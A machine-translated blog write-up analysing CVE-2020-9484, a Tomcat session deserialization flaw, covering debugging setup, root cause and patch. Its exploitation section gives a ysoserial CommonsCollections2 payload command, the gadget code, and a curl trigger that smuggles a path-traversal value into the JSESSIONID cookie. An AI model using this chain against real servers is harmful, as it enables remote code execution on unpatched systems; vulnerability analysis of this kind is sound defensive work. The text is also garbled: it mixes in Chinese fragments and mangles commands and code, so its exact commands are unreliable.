Shulou(Shulou.com)05/31 Report--

This article introduces the CVE-2020-9484 tomcat session deserialization vulnerability example analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

The following is a detailed introduction of the local and remote debugging Tomcat source code with the help of CVE-2020-9484 Tomcat vulnerability. Analyze the causes of vulnerabilities and patches, as well as analyze the ysoserial deserialization chain.

Brief introduction of 0x01 vulnerabilities

Apache Tomcat posted an announcement that fixed a remote code execution vulnerability (CVE-2020-9484) originating from persistent Session. The vulnerability conditions are harsh: 1. Tomcat must enable session persistence feature FileStore 2. Dependencies under tomcat/lib or WEB-INF/lib directory have available gadget 3. The content of a known path file is controllable on the server.

0x02 scope of influence Apache Tomcat 10.x

< 10.0.0-M5Apache Tomcat 9.x < 9.0.35Apache Tomcat 8.x < 8.5.55Apache Tomcat 7.x < 7.0.1040x03 漏洞依赖条件 从官网下载tomcat 8.5.30 0x1 配置session持久化 conf/context.xml 0x2 部署Gadgets jar包 下载commons-collections4-4.0.jar 并放在tomcat lib/目录下

0x04 multiple Tomcat debugging methods

0x1 local debugging

Use intellij idea for local debugging, create projects, add tomcat services, add tomcat source packages, and configure project lib library files

Step1 creates a project

Create a web Application project

Step2 add tomcat service

Select configurations to configure tomcat service information as shown in the following figure

Select tomcat local, tomcat path, configure port, etc.

Step3 add tomcat source code

Add tomcat source code to intellij idea

Step4 configuration project lib library file

To make the code indexed for debugging, set the tomcat-related jar and source code to library, as shown in the following figure

0x2 remote debugging

Use intellij idea for remote debugging, modify the default startup script and add remote debugging configuration

0x1 modifies startup script

Modify catalina.bat to add debug configuration, debug port is 5005, this is to verify whether the port is prohibited by the firewall

CATALINA_OPTS= "- server-Xdebug-Xnoagent-Djava.compiler=NONE-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005"

Check if the port is open

╰─➤ lsof-ilsof 5005 1 ↵ COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAMEjava 65934 xx 6u IPv4 0x66cb19ff98f7365b 0t0 TCP localhost:avt-profile-2 (LISTEN)

0x2 opens the project

Open the tomcat 8.5.30 source code directly

0x3 configuration debug Properties

Configure debug ip and port in intellij idea

Principle and trigger Analysis of 0x05 vulnerability

When using tomcat, if you use the session persistence feature provided by tomcat, you will attempt to read and deserialize the contents of the session file in one session.

The specific logic is as follows:

0x1 path stitching

If session persistence is turned on, tomcat will take the name of session as the file name and read it.

Java path org.apache.catalina.session.FileStore:

Use id as the file name to concatenate directly in the file function. Here, you can traverse the path to the root directory, as shown below:

0x2 deserialization

After stitching the path, Tomcat brings the contents of the read file into the deserialization function. If there is a file upload vulnerability at this time, it can achieve the effect of deserializing RCE.

0x06 vulnerability exploitation

0x1 generates payload

The deserialization file is generated through Ysoserial. The generation method and principle are as follows: generate the CommonsCollections2 deserialization payload of the pop-up calculator

Java-jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections2 "/ Applications/Calculator.app/Contents/MacOS/Calculator" > / tmp/test.session

Generate the key code for payload

Dependencies ({"org.apache.commons:commons-collections4:4.0"}) @ Authors ({"frohoff"}) public class CommonsCollections2 implements ObjectPayload {public CommonsCollections2 () {} public Queue getObject (String command) throws Exception {Object templates = Gadgets.createTemplatesImpl (command); InvokerTransformer transformer = new InvokerTransformer ("toString", new Class [0], new Object [0]); PriorityQueue queue = new PriorityQueue (2, new TransformingComparator (transformer)); queue.add (1) Queue.add (1); Reflections.setFieldValue (transformer, "iMethodName", "newTransformer"); Object [] queueArray = (Object []) (Object []) Reflections.getFieldValue (queue, "queue")); queueArray [0] = templates; queueArray [1] = 1; return queue;} public static void main (String [] args) throws Exception {PayloadRunner.run (CommonsCollections2.class, args);}}

Complete vulnerability exploitation chain

/ * Gadget chain: ObjectInputStream.readObject () PriorityQueue.readObject ()... TransformingComparator.compare () InvokerTransformer.transform () Method.invoke () Runtime.exec () * /

For more information about the use of chain correlation, please refer to https://xz.aliyun.com/t/1756

0x2 trigger

Curl 'http://127.0.0.1:8080/index.jsp'-H' Cookie: JSESSIONID=../tmp/test'

The call stack can also be seen through the error echo.

0x07 vulnerability patch

From github tomcat 8.5.55, we can see that the vulnerability is fixed in the file judgment, and no bypass posture has been found at present.

This is the end of the example analysis of CVE-2020-9484 tomcat session deserialization vulnerabilities. I hope the above can be helpful and learn more. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.